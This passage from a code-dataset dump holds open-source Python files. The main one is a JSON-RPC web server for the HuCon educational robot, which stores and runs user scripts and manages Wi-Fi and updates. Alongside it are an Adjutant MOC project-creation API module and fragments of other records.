img_name)\n","repo_name":"hasegaw/IkaLog","sub_path":"ikalog/utils/player_name.py","file_name":"player_name.py","file_ext":"py","file_size_in_byte":4043,"program_lang":"python","lang":"en","doc_type":"code","stars":272,"dataset":"github-code","pt":"72"} +{"seq_id":"5585886351","text":"import threading\nfrom datetime import datetime, timedelta\nimport os\nfrom os.path import expanduser\nimport json\nimport subprocess\nimport time\nimport tempfile\nimport signal\nimport socket\nimport typing\n\nfrom HuConLogMessage import HuConLogMessage\nimport HuConNetiface\nfrom PyUci import WirelessHelper\n\n\nclass HuConJsonRpc:\n \"\"\" This class implements the functionality of the which will the server provide.\n \"\"\"\n\n # Name 
for the server to identification\n _SERVER_NAME = 'HuConRobot'\n\n # Folder where all custom code files are stored.\n _CODE_ROOT = os.path.join(expanduser(\"~\"), 'hucon', 'code')\n\n # Folder where all custom code files are stored.\n _EXAMPLE_ROOT = os.path.join(os.path.abspath(os.path.join(os.getcwd(), os.pardir)), 'code')\n\n # Path to the version file.\n _VERSION_FILE = os.path.join(os.path.abspath(os.path.join(os.getcwd(), os.pardir)), '__version__')\n\n # Path to the update file.\n _UPDATE_FILE = os.path.join(os.path.abspath(os.path.join(os.getcwd(), os.pardir)), 'update.sh')\n\n # Define the port on which the server should listening on.\n _LISTENING_PORT = 8080\n\n # Current version of the server.\n _version = 'beta'\n\n # Store the current running state\n _is_running = False\n\n # Store the current process to communicate with a running process\n _current_proc = None\n\n # Queue for all log messages\n _log = HuConLogMessage()\n\n # Wireless Helper object for handle wireless settings\n _wifi = WirelessHelper(_log)\n\n _message_buffer_for_input: typing.List[str] = []\n\n def __init__(self):\n \"\"\" Initialize the RPC server.\n \"\"\"\n if os.path.exists(self._VERSION_FILE):\n with open(self._VERSION_FILE, 'r') as file:\n self._version = file.readline()\n\n if not os.path.exists(self._CODE_ROOT):\n os.makedirs(self._CODE_ROOT)\n\n print('%s v. %s' % (self._SERVER_NAME, self._version))\n print('Custom code path: \\'%s\\'' % self._CODE_ROOT)\n print('Example code path: \\'%s\\'' % self._EXAMPLE_ROOT)\n\n def handle_control(self, rpc_request):\n \"\"\" Handle the JSON RPC request.\n \"\"\"\n if rpc_request['method'] == 'get_version':\n return self._get_version(rpc_request)\n elif rpc_request['method'] == 'get_robot_info':\n return self._get_robot_info(rpc_request)\n elif rpc_request['method'] == 'poll':\n return self._poll(rpc_request)\n elif rpc_request['method'] == 'get_file_list':\n return self._get_file_list(rpc_request)\n elif rpc_request['method'] == 'create_folder':\n return self._create_folder(rpc_request)\n elif rpc_request['method'] == 'load_file':\n return self._load_file(rpc_request)\n elif rpc_request['method'] == 'save_file':\n return self._save_file(rpc_request)\n elif rpc_request['method'] == 'is_running':\n return self._get_is_running(rpc_request)\n elif rpc_request['method'] == 'execute':\n return self._execute(rpc_request)\n elif rpc_request['method'] == 'run':\n return self._run(rpc_request)\n elif rpc_request['method'] == 'push_input':\n return self._receive_input(rpc_request)\n elif rpc_request['method'] == 'kill':\n return self._kill(rpc_request)\n elif rpc_request['method'] == 'get_possible_post_data':\n return self._get_possible_post_data(rpc_request)\n elif rpc_request['method'] == 'event':\n return self._event(rpc_request)\n elif rpc_request['method'] == 'check_update':\n return self._check_update(rpc_request)\n elif rpc_request['method'] == 'update':\n return self._update(rpc_request)\n elif rpc_request['method'] == 'shutdown':\n return self._shutdown(rpc_request)\n elif rpc_request['method'] == 'get_saved_wifi_networks':\n return self._get_saved_wifi_networks(rpc_request)\n elif rpc_request['method'] == 'get_wifi_found':\n return self._get_wifi_found(rpc_request)\n elif rpc_request['method'] == 'add_wifi':\n return self._add_wifi(rpc_request)\n elif rpc_request['method'] == 'move_wifi_up':\n return self._move_wifi_up(rpc_request)\n elif rpc_request['method'] == 'move_wifi_down':\n return self._move_wifi_down(rpc_request)\n elif rpc_request['method'] == 
'remove_wifi':\n return self._remove_wifi(rpc_request)\n elif rpc_request['method'] == 'connect_wifi':\n return self._connect_wifi(rpc_request)\n elif rpc_request['method'] == 'enable_sta_wifi':\n return self._enable_sta_wifi(rpc_request)\n elif rpc_request['method'] == 'disable_sta_wifi':\n return self._disable_sta_wifi(rpc_request)\n elif rpc_request['method'] == 'get_ap_settings':\n return self._get_ap_settings(rpc_request)\n elif rpc_request['method'] == 'enable_ap_wifi':\n return self._enable_ap_wifi(rpc_request)\n elif rpc_request['method'] == 'disable_ap_wifi':\n return self._disable_ap_wifi(rpc_request)\n elif rpc_request['method'] == 'set_ap_settings':\n return self._set_ap_settings(rpc_request)\n else:\n return self._return_error(rpc_request['id'], 'Command not known.')\n\n @staticmethod\n def _get_rpc_response(rpc_id):\n \"\"\" Return a json rpc response message.\n \"\"\"\n rpc_response = {\n 'jsonrpc': '2.0',\n 'id': rpc_id}\n\n return rpc_response\n\n @staticmethod\n def _return_error(rpc_id, error, status_code=400):\n \"\"\" Return an well formed error.\n \"\"\"\n rpc_response = {'jsonrpc': '2.0',\n 'error': error,\n 'id': rpc_id}\n\n return json.dumps(rpc_response), status_code\n\n @staticmethod\n def _replace_hucon_requests(message):\n \"\"\" Print an answer from HuCon whenever the the message 'Hello HuCon!' is found.\n \"\"\"\n search_string = 'print(\\'Hello HuCon!\\')'\n replace_string = 'print(\\'Hello HuCon!\\\\n\\\\nHello human!\\\\nI am a Hu[man] Con[trolled] robot.\\\\n\\')'\n if search_string in message:\n message = message.replace(search_string, replace_string)\n return message\n\n _file_runner = None\n\n def _run_file(self, filename):\n \"\"\" This function takes care about starting and stopping the thread for running user python scripts\n \"\"\"\n if self._file_runner is not None:\n self._kill_process()\n self._file_runner.join()\n self._file_runner = None\n\n self._file_runner = threading.Thread(target=self._run_file_worker, args=(filename,))\n self._file_runner.start()\n\n def _run_file_worker(self, filename):\n \"\"\" Threaded worker function for running the user scripts.\n It catches all outputs and provides input functions for the process\n \"\"\"\n error_detected = False\n # I am feeling very guilty - but it seems to be a very effective solution\n ugly_hack = '#!/usr/bin/env python\\n' \\\n '# -*- coding: utf-8 -*-\\n' \\\n 'def input(enquiry):\\n' \\\n ' print(enquiry + u\"\\u2504\")\\n' \\\n ' return globals()[\\'__builtins__\\'].input(\\'\\')\\n' \\\n 'exec(open(r\\'' + filename + '\\').read())'\n\n self._current_proc = subprocess.Popen(['python3', '-X utf8', '-c', ugly_hack],\n bufsize=1,\n stdin=subprocess.PIPE,\n stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT,\n encoding='utf-8',\n universal_newlines=True)\n self._is_running = True\n while True:\n output = self._current_proc.stdout.readline()\n if output == '' and self._current_proc.poll() is not None:\n break\n if output:\n # this is an input inquiry (https://en.wikipedia.org/wiki/Unicode_control_characters 0x2405 is ENQ)\n if output.endswith(\"\\u2504\\n\"):\n timeout_time = datetime.now() + timedelta(minutes=5)\n\n line = output.replace(\"\\u2504\\n\", \"\")\n self._log.put_input(line)\n\n while len(self._message_buffer_for_input) == 0:\n if datetime.now() >= timeout_time:\n self._message_buffer_for_input.append(\"Timeout!\\n\")\n break\n\n # I know that this is not the preferred method of communication with\n # sub processes, but communicate does not provide on demand communication as 
stdin/stdout does\n # but just collects all inputs and writes all outputs at the end\n self._current_proc.stdin.write(self._message_buffer_for_input.pop() + '\\n')\n else:\n file_error_string = 'File \"' + filename + '\", l'\n if output.find(file_error_string) != -1:\n error_detected = True\n # Replace the file error like 'File \"/tmp/execute.py\", line x, in'\n line = output.replace(file_error_string, '[red]Error: L')\n self._log.put_output(line)\n\n self._current_proc.poll()\n self._is_running = False\n if not error_detected:\n self._log.put_output('')\n self._log.put_output('[green]Done ...')\n\n # Wait until the queue is empty or the timout occurred\n timeout = 0\n while (self._log.empty() is False) and (timeout < 30):\n time.sleep(0.1)\n timeout += 1\n\n # ------------------------------------------------------------------------------------------------------------------\n # JSON RPC API Methods\n # ------------------------------------------------------------------------------------------------------------------\n\n def _get_version(self, rpc_request):\n \"\"\" Get the version of this project.\n \"\"\"\n try:\n rpc_response = self._get_rpc_response(rpc_request['id'])\n rpc_response['result'] = self._version\n json_dump = json.dumps(rpc_response)\n except Exception as ex:\n return self._return_error(rpc_request['id'], 'Could not determine version. (%s)' % str(ex))\n else:\n return json_dump\n\n def _get_robot_info(self, rpc_request):\n \"\"\" Get information about the individual robot\n \"\"\"\n try:\n hucon_name = socket.gethostname()\n net_interface_infos = {\n interface_name: HuConNetiface.get_info(interface_name)\n for interface_name in [\"br-wlan\", \"apcli0\"]\n }\n rpc_response = self._get_rpc_response(rpc_request['id'])\n rpc_response['result'] = {\n 'name': hucon_name,\n 'mac_address': net_interface_infos[\"br-wlan\"].mac_address,\n 'ipv4_addresses': [\n info.ipv4_address for info in net_interface_infos.values()\n ]\n }\n json_dump = json.dumps(rpc_response)\n except Exception as ex:\n return self._return_error(\n rpc_request['id'],\n 'Could not get robot info. (%s)' % str(ex)\n )\n return json_dump\n\n def _poll(self, rpc_request):\n \"\"\" Return the log messages to the browser.\n \"\"\"\n messages = self._log.get_messages()\n # noinspection PyBroadException\n try:\n rpc_response = self._get_rpc_response(rpc_request['id'])\n rpc_response['messages'] = messages\n json_dump = json.dumps(rpc_response, default=lambda x: x.serialize())\n except Exception:\n # The message could not transferred to the browser. So re queue it!\n self._log.requeue(messages)\n else:\n return json_dump\n\n def _get_file_list(self, rpc_request):\n \"\"\" Return the list of all files/folder to the browser.\n \"\"\"\n try:\n code_folder = os.path.join(self._CODE_ROOT, rpc_request['params'].strip('/\\\\'))\n example_folder = os.path.join(self._EXAMPLE_ROOT, rpc_request['params'].strip('/\\\\'))\n\n files_usercode = []\n rpc_response = self._get_rpc_response(rpc_request['id'])\n if os.path.exists(code_folder):\n files_usercode = os.listdir(code_folder)\n files_usercode.sort()\n files_examples = os.listdir(example_folder)\n files_examples.sort()\n rpc_response['result'] = files_examples + files_usercode\n rpc_response['result'].sort()\n json_dump = json.dumps(rpc_response)\n\n except Exception as e:\n return self._return_error(rpc_request['id'], 'Could not get a file list for the folder. 
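# _run_file_worker above talks to the child over a tiny ad-hoc protocol: the
# injected input() replacement prints the prompt with a trailing U+2504
# sentinel, and the parent watches stdout for that sentinel before writing a
# reply to the child's stdin. A stripped-down, self-contained version of that
# handshake (a demo, not the HuCon code itself):
import subprocess
import sys

CHILD_SOURCE = (
    "import builtins\n"
    "def input(prompt):\n"
    "    print(prompt + '\\u2504', flush=True)\n"
    "    return builtins.input('')\n"
    "name = input('Name?')\n"
    "print('Hello ' + name)\n"
)

proc = subprocess.Popen(
    [sys.executable, '-c', CHILD_SOURCE],
    stdin=subprocess.PIPE, stdout=subprocess.PIPE,
    encoding='utf-8',
)
for line in proc.stdout:
    if line.endswith('\u2504\n'):        # sentinel: the child wants input
        print('child asked:', line.rstrip('\u2504\n'))
        proc.stdin.write('HuCon\n')      # answer the pending input()
        proc.stdin.flush()
    else:
        print('child said:', line, end='')
proc.wait()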
(%s)' % str(e))\n else:\n return json_dump\n\n def _create_folder(self, rpc_request):\n \"\"\" Creates the folder on the device.\n \"\"\"\n try:\n new_folder = os.path.join(self._CODE_ROOT, rpc_request['params'].strip('/\\\\'))\n\n if not os.path.exists(new_folder):\n os.makedirs(new_folder)\n\n rpc_response = self._get_rpc_response(rpc_request['id'])\n json_dump = json.dumps(rpc_response)\n except Exception as ex:\n return self._return_error(rpc_request['id'], 'Could not create the folder. (%s)' % str(ex))\n else:\n return json_dump\n\n def _load_file(self, rpc_request):\n \"\"\" Return the content of the file back to the browser.\n \"\"\"\n try:\n # TODO: Extract file base path (examples/user code) from rpc call and remove this hack\n filename = os.path.join(self._CODE_ROOT, rpc_request['params'].strip('/\\\\'))\n if not os.path.exists(filename):\n filename = os.path.join(self._EXAMPLE_ROOT, rpc_request['params'].strip('/\\\\'))\n\n rpc_response = self._get_rpc_response(rpc_request['id'])\n f = open(filename, 'r')\n rpc_response['result'] = f.read()\n f.close()\n json_dump = json.dumps(rpc_response)\n except Exception as ex:\n return self._return_error(rpc_request['id'], 'Could not get the content of the file. (%s)' % str(ex))\n else:\n return json_dump\n\n def _save_file(self, rpc_request):\n \"\"\" Save the received content on the local disk.\n \"\"\"\n # Store all incoming data into the file.\n try:\n rpc_response = self._get_rpc_response(rpc_request['id'])\n filename = os.path.join(self._CODE_ROOT, rpc_request['params']['filename'].strip('/\\\\'))\n with open(filename, 'w') as file:\n file.writelines(rpc_request['params']['data'])\n rpc_response['result'] = 'File %s saved.' % rpc_request['params']['filename']\n json_dump = json.dumps(rpc_response)\n except Exception as ex:\n return self._return_error(rpc_request['id'], 'Could not save the content of the file. (%s)' % str(ex))\n else:\n return json_dump\n\n def _get_is_running(self, rpc_request):\n \"\"\" Get the current running state of the device\n \"\"\"\n try:\n rpc_response = self._get_rpc_response(rpc_request['id'])\n rpc_response['result'] = self._is_running\n json_dump = json.dumps(rpc_response)\n except Exception as ex:\n return self._return_error(rpc_request['id'],\n 'Could not determine if there is a program running. 
(%s)' % str(ex))\n        else:\n            return json_dump\n\n    def _execute(self, rpc_request):\n        \"\"\" Store the data in a local file and execute it.\n        \"\"\"\n        if self._is_running is False:\n            try:\n                self._is_running = True\n\n                filename = os.path.join(tempfile.gettempdir(), 'execute.py')\n\n                with open(filename, 'wt') as file:\n                    file.writelines(self._replace_hucon_requests(rpc_request['params']))\n\n                # Wait for a while until the file is really closed before it can be executed.\n                time.sleep(0.2)\n\n                self._run_file(filename)\n\n            except Exception as ex:\n                self._log.put_output('Error: \"%s\" Trace: \"%s\"' % (str(ex), str(ex.__traceback__)))\n\n                self._is_running = False\n                self._current_proc = None\n\n        else:\n            return self._return_error(rpc_request['id'], 'There is a program running.', 503)\n\n        rpc_response = self._get_rpc_response(rpc_request['id'])\n        return json.dumps(rpc_response)\n\n    def _run(self, rpc_request):\n        \"\"\" Run the file which is saved on the device\n        \"\"\"\n        if self._is_running is False:\n            try:\n                filename = os.path.join(self._CODE_ROOT, rpc_request['params'].strip('/\\\\'))\n\n                self._is_running = True\n\n                self._run_file(filename)\n\n            except Exception as ex:\n                self._log.put_output('Error: \"%s\" Trace: \"%s\"' % (str(ex), str(ex.__traceback__)))\n\n                self._is_running = False\n                self._current_proc = None\n        else:\n            return self._return_error(rpc_request['id'], 'There is a program running.', 503)\n\n        rpc_response = self._get_rpc_response(rpc_request['id'])\n        return json.dumps(rpc_response)\n\n    def _receive_input(self, rpc_request):\n        \"\"\" Receives input from the client\n        \"\"\"\n        try:\n            self._message_buffer_for_input.append(rpc_request['message'])\n        except Exception as ex:\n            return self._return_error(rpc_request['id'], 'Could not forward the input. (%s)' % str(ex))\n\n        rpc_response = self._get_rpc_response(rpc_request['id'])\n        return json.dumps(rpc_response)\n\n    def _kill(self, rpc_request):\n        \"\"\" Kill the current running process\n        \"\"\"\n        self._kill_process()\n\n        rpc_response = self._get_rpc_response(rpc_request['id'])\n        rpc_response['result'] = 'Application stopped.'\n        return json.dumps(rpc_response)\n\n    def _kill_process(self):\n        if hasattr(signal, 'CTRL_C_EVENT'):\n            sig_ctrl_c = signal.CTRL_C_EVENT\n        else:\n            sig_ctrl_c = signal.SIGINT\n\n        signal_list = [sig_ctrl_c,\n                       sig_ctrl_c,\n                       signal.SIGTERM,\n                       signal.SIGABRT]\n        for currentSignal in signal_list:\n            if self._current_proc:\n                # noinspection PyBroadException\n                try:\n                    self._current_proc.send_signal(currentSignal)\n                    self._current_proc.wait(0.1)\n                except Exception:\n                    pass\n\n        if self._current_proc:\n            # noinspection PyBroadException\n            try:\n                self._current_proc.kill()\n                self._current_proc.wait(0.1)\n            except Exception:\n                pass\n\n        if not self._current_proc:\n            self._is_running = False\n\n    def _get_possible_post_data(self, rpc_request):\n        \"\"\" Return the json of available post data events.\n        \"\"\"\n        try:\n            rpc_response = self._get_rpc_response(rpc_request['id'])\n            with open(os.path.join(tempfile.gettempdir(), 'possible_events'), 'r') as file:\n                rpc_response['result'] = json.load(file)\n        except Exception as ex:\n            return self._return_error(rpc_request['id'],\n                                      'Could not retrieve the list of possible events. 
(%s)' % str(ex), 500)\n else:\n return json.dumps(rpc_response)\n\n def _event(self, rpc_request):\n \"\"\" Fire the event on the device.\n \"\"\"\n if self._is_running:\n\n try:\n if os.name == 'nt':\n return self._return_error(rpc_request['id'], 'Could not set the event on windows machines.', 500)\n\n os.kill(self._current_proc.pid, signal.SIGRTMIN + rpc_request['params'])\n except Exception as ex:\n return self._return_error(rpc_request['id'], 'Could not set the event. (%s)' % str(ex), 503)\n else:\n return self._return_error(rpc_request['id'], 'There is no program running.', 503)\n\n rpc_response = self._get_rpc_response(rpc_request['id'])\n return json.dumps(rpc_response)\n\n def _check_update(self, rpc_request):\n \"\"\" Check if there is an update available.\n \"\"\"\n try:\n proc = subprocess.Popen(['bash', self._UPDATE_FILE, '-c'], bufsize=0, stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT, encoding='utf-8')\n\n while True:\n output = proc.stdout.readline()\n if output == '' and proc.poll() is not None:\n break\n if output:\n self._log.put_output(output.strip())\n proc.poll()\n\n rpc_response = self._get_rpc_response(rpc_request['id'])\n if proc.returncode == 1:\n rpc_response['result'] = True\n else:\n rpc_response['result'] = False\n except Exception as ex:\n return self._return_error(rpc_request['id'], 'Could not get a version. (%s)' % str(ex), 500)\n else:\n return json.dumps(rpc_response)\n\n def _update(self, rpc_request):\n \"\"\" Update all files from the project.\n \"\"\"\n try:\n # Update the system first.\n self._log.put_output('The system will be updated and needs a few seconds.\\n')\n proc = subprocess.Popen(['bash', self._UPDATE_FILE, '-u'], bufsize=0, stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT, encoding='utf-8')\n\n while True:\n output = proc.stdout.readline()\n if output == '' and proc.poll() is not None:\n break\n if output:\n self._log.put_output(output.strip())\n proc.poll()\n\n # Do a restart.\n proc = subprocess.Popen(['bash', self._UPDATE_FILE, '-r'], bufsize=0, stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT, encoding='utf-8')\n\n while True:\n output = proc.stdout.readline()\n if output == '' and proc.poll() is not None:\n break\n if output:\n self._log.put_output(output.strip())\n proc.poll()\n\n except Exception as ex:\n return self._return_error(rpc_request['id'], 'Could not perform an update. (%s)' % str(ex), 500)\n else:\n # This should never be reached in term of the system reboot\n return self._return_error(rpc_request['id'], 'Could not perform an update.', 500)\n\n def _shutdown(self, rpc_request):\n \"\"\" Shutdown the robot.\n \"\"\"\n try:\n self._log.put_output('The system will be shutdown.\\n')\n proc = subprocess.Popen(['bash', self._UPDATE_FILE, '-s'], bufsize=0, stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT, encoding='utf-8')\n\n while True:\n output = proc.stdout.readline()\n if output == '' and proc.poll() is not None:\n break\n if output:\n self._log.put_output(output.strip())\n proc.poll()\n except Exception as ex:\n return self._return_error(rpc_request['id'], 'Could not shutdown the system. 
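# _event above maps a UI event number onto a POSIX real-time signal and
# delivers it with os.kill(pid, signal.SIGRTMIN + n). A matching receiver
# sketch for the process on the other end (POSIX-only; the handler body and
# event range are illustrative):
import signal


def make_handler(number):
    def handler(signum, frame):
        print(f'event {number} received (signal {signum})')
    return handler


if hasattr(signal, 'SIGRTMIN'):
    # Mirror SIGRTMIN + rpc_request['params'] for event numbers 0..3.
    for n in range(4):
        signal.signal(signal.SIGRTMIN + n, make_handler(n))
    print('waiting; send SIGRTMIN+n to this process to fire an event')
    signal.pause()  # sleep until any signal arrives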
(%s)' % str(ex), 500)\n        else:\n            # This should never be reached because of the system shutdown.\n            return self._return_error(rpc_request['id'], 'Could not shutdown the system.', 500)\n\n    # Wireless settings section\n    def _get_wifi_found(self, rpc_request):\n        \"\"\"\n        Scan for Wi-Fi networks and return the scan results as rpc_response\n        :param rpc_request:\n        :return: rpc_response\n        \"\"\"\n        try:\n            self._log.put_output('Search for WiFi.\\n')\n            device = json.dumps({\"device\": \"ra0\"})\n            wifi_scan_output = json.loads(\n                subprocess.check_output(['ubus', 'call', 'onion', 'wifi-scan', device]).decode())\n            rpc_response = self._get_rpc_response(rpc_request['id'])\n            rpc_response['result'] = wifi_scan_output['results']\n        except Exception as ex:\n            return self._return_error(rpc_request['id'], 'Could not search for WiFi. (%s)' % str(ex), 500)\n        else:\n            return json.dumps(rpc_response)\n\n    def _get_saved_wifi_networks(self, rpc_request):\n        \"\"\"\n        Returns saved networks as rpc_response\n        :param rpc_request:\n        :return: rpc_response\n        \"\"\"\n        try:\n            self._log.put_output('Read WiFi Settings.\\n')\n            wifi_disabled = self._wifi.is_wifi_disabled()\n            wifi_output_list = self._wifi.get_saved_wifi_networks()\n            rpc_response = self._get_rpc_response(rpc_request['id'])\n            result = {\"wifi_list\": wifi_output_list, \"wifi_disabled\": wifi_disabled}\n            rpc_response['result'] = result\n        except Exception as ex:\n            return self._return_error(rpc_request['id'], 'Could not read WiFi settings. (%s)' % str(ex), 500)\n        else:\n            return json.dumps(rpc_response)\n\n    def _add_wifi(self, rpc_request):\n        \"\"\"\n        Add new Wi-Fi network to configuration\n        :param rpc_request:\n        :return: rpc_response\n        \"\"\"\n        try:\n            self._log.put_output('Add new WiFi.\\n')\n            self._wifi.add_wifi(ssid=rpc_request['params'][0],\n                                key=rpc_request['params'][1],\n                                encryption=rpc_request['params'][2])\n        except Exception as ex:\n            return self._return_error(rpc_request['id'], 'Could not add new WiFi network. (%s)' % str(ex), 500)\n        else:\n            rpc_response = self._get_rpc_response(rpc_request['id'])\n            return json.dumps(rpc_response)\n\n    def _move_wifi_up(self, rpc_request):\n        \"\"\"\n        Move Wi-Fi network up in priority list\n        :param rpc_request:\n        :return: rpc_response\n        \"\"\"\n        try:\n            self._log.put_output('Move WiFi up.\\n')\n            self._wifi.move_wifi_up(rpc_request['params'][0])\n        except Exception as ex:\n            return self._return_error(rpc_request['id'], 'Could not move WiFi network up. (%s)' % str(ex), 500)\n        else:\n            rpc_response = self._get_rpc_response(rpc_request['id'])\n            return json.dumps(rpc_response)\n\n    def _move_wifi_down(self, rpc_request):\n        \"\"\"\n        Move Wi-Fi network down in priority list\n        :param rpc_request:\n        :return: rpc_response\n        \"\"\"\n        try:\n            self._log.put_output('Move WiFi down.\\n')\n            self._wifi.move_wifi_down(rpc_request['params'][0])\n        except Exception as ex:\n            return self._return_error(rpc_request['id'], 'Could not move WiFi network down. (%s)' % str(ex), 500)\n        else:\n            rpc_response = self._get_rpc_response(rpc_request['id'])\n            return json.dumps(rpc_response)\n\n    def _remove_wifi(self, rpc_request):\n        \"\"\"\n        Remove Wi-Fi network from settings\n        :param rpc_request:\n        :return: rpc_response\n        \"\"\"\n        try:\n            self._log.put_output('Remove WiFi.\\n')\n            self._wifi.remove_wifi(rpc_request['params'][0])\n        except Exception as ex:\n            return self._return_error(rpc_request['id'], 'Could not remove WiFi network. 
(%s)' % str(ex), 500)\n        else:\n            rpc_response = self._get_rpc_response(rpc_request['id'])\n            return json.dumps(rpc_response)\n\n    def _connect_wifi(self, rpc_request):\n        \"\"\"\n        Connect selected Wi-Fi network\n        :param rpc_request:\n        :return: rpc_response\n        \"\"\"\n        try:\n            self._log.put_output('Connect WiFi.\\n')\n            self._wifi.connect_wifi(rpc_request['params'][0])\n        except Exception as ex:\n            return self._return_error(rpc_request['id'], 'Could not connect to WiFi network. (%s)' % str(ex), 500)\n        else:\n            rpc_response = self._get_rpc_response(rpc_request['id'])\n            return json.dumps(rpc_response)\n\n    def _enable_sta_wifi(self, rpc_request):\n        \"\"\"\n        Enable STA radio\n        :param rpc_request:\n        :return: rpc_response\n        \"\"\"\n        try:\n            self._log.put_output('Enable WiFi.\\n')\n            self._wifi.enable_sta_wifi()\n        except Exception as ex:\n            return self._return_error(rpc_request['id'], 'Could not enable WiFi. (%s)' % str(ex), 500)\n        else:\n            rpc_response = self._get_rpc_response(rpc_request['id'])\n            return json.dumps(rpc_response)\n\n    def _disable_sta_wifi(self, rpc_request):\n        \"\"\"\n        Disable STA radio\n        :param rpc_request:\n        :return: rpc_response\n        \"\"\"\n        try:\n            self._log.put_output('Disable WiFi.\\n')\n            self._wifi.disable_sta_wifi()\n        except Exception as ex:\n            return self._return_error(rpc_request['id'], 'Could not disable WiFi. (%s)' % str(ex), 500)\n        else:\n            rpc_response = self._get_rpc_response(rpc_request['id'])\n            return json.dumps(rpc_response)\n\n    def _get_ap_settings(self, rpc_request):\n        \"\"\"\n        Returns AP Settings in rpc_response\n        :param rpc_request:\n        :return: rpc_response\n        \"\"\"\n        try:\n            self._log.put_output('Get AP Settings.\\n')\n            rpc_response = self._get_rpc_response(rpc_request['id'])\n            rpc_response['result'] = self._wifi.get_ap_settings()\n        except Exception as ex:\n            return self._return_error(rpc_request['id'], 'Could not get AP settings. (%s)' % str(ex), 500)\n        else:\n            return json.dumps(rpc_response)\n\n    def _enable_ap_wifi(self, rpc_request):\n        \"\"\"\n        Enable AP radio\n        :param rpc_request:\n        :return: rpc_response\n        \"\"\"\n        try:\n            self._log.put_output('Enable AP WiFi.\\n')\n            self._wifi.enable_ap_wifi()\n        except Exception as ex:\n            return self._return_error(rpc_request['id'], 'Could not enable AP WiFi. (%s)' % str(ex), 500)\n        else:\n            rpc_response = self._get_rpc_response(rpc_request['id'])\n            return json.dumps(rpc_response)\n\n    def _disable_ap_wifi(self, rpc_request):\n        \"\"\"\n        Disable AP radio\n        :param rpc_request:\n        :return: rpc_response\n        \"\"\"\n        try:\n            self._log.put_output('Disable AP WiFi.\\n')\n            self._wifi.disable_ap_wifi()\n        except Exception as ex:\n            return self._return_error(rpc_request['id'], 'Could not disable AP WiFi. (%s)' % str(ex), 500)\n        else:\n            rpc_response = self._get_rpc_response(rpc_request['id'])\n            return json.dumps(rpc_response)\n\n    def _set_ap_settings(self, rpc_request):\n        \"\"\"\n        Set AP WiFi settings\n        :param rpc_request:\n        :return: rpc_response\n        \"\"\"\n        try:\n            self._log.put_output('Set AP WiFi Settings.\\n')\n            self._wifi.set_ap_settings(ssid=rpc_request['params'][0],\n                                       key=rpc_request['params'][1],\n                                       encryption=rpc_request['params'][2],\n                                       ip=rpc_request['params'][3])\n        except Exception as ex:\n            return self._return_error(rpc_request['id'], 'Could not configure AP WiFi settings. 
(%s)' % str(ex), 500)\n else:\n rpc_response = self._get_rpc_response(rpc_request['id'])\n return json.dumps(rpc_response)\n","repo_name":"basler/hucon","sub_path":"webserver/HuConJsonRpc.py","file_name":"HuConJsonRpc.py","file_ext":"py","file_size_in_byte":32278,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"40644476120","text":"# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom confspirator import groups as config_groups\nfrom confspirator import fields as config_fields\nfrom adjutant.api import utils\n\nfrom adjutant_moc.apis import base\n\n\nclass MocProjects(base.MocBaseApi):\n \"\"\"\n API Endpoint for applying, or listing accessible projects.\n \"\"\"\n\n url = r'^moc/Projects/?$'\n task_type = 'moc_create_project'\n\n config_group = config_groups.DynamicNameConfigGroup(\n children=[\n config_fields.BoolConfig(\n 'create_default_network',\n help_text='If set to faulse, overrides what is in setup_network.',\n default=True,\n sample_default=True,\n ),\n config_fields.StrConfig(\n 'region',\n help_text='Region for creating default network and quota.',\n default='RegionOne',\n sample_default='RegionOne'\n ),\n config_fields.StrConfig(\n \"project_domain_id\",\n help_text=\"Domain id for projects.\",\n default=\"default\",\n sample_default=\"Default\"\n ),\n ]\n )\n\n @utils.authenticated\n def post(self, request, format=None):\n request.data['email'] = request.keystone_user['username']\n request.data['region'] = self.config['region']\n request.data['domain_id'] = self.config['project_domain_id']\n\n if not self.config['create_default_network']:\n request.data['setup_network'] = False\n\n if 'project_name' not in request.data:\n message = 'Missing project_name in request.'\n self.logger.info(message)\n return self.response(message, 400)\n\n project = self.identity.find_project(\n request.data['project_name'], self.config.project_domain_id)\n if project:\n message = ('Project %s already exists.'\n % request.data['project_name'])\n self.logger.info(message)\n return self.response_error(message, 409)\n\n return self.create_task(request)\n\n @utils.authenticated\n def get(self, request, format=None):\n # List other projects that a user has access to, or has applied for.\n pass\n\n\nclass MocProjectServices(base.MocBaseApi):\n \"\"\"\n API Endpoint for listing and applying for more services to a project.\n \"\"\"\n\n url = r'^moc/Services/?$'\n\n @utils.authenticated\n def get(self, request, format=None):\n # List other projects that a user has access to, or has applied for.\n pass\n","repo_name":"CCI-MOC/adjutant-moc","sub_path":"adjutant_moc/apis/projects.py","file_name":"projects.py","file_ext":"py","file_size_in_byte":3097,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"5469266773","text":"\"\"\"Module containing animation1 plugin.\"\"\"\n\nfrom typing import TYPE_CHECKING, Any\n\nfrom nxscli_mpl.animation_mpl import IPluginAnimation\nfrom nxscli_mpl.plot_mpl 
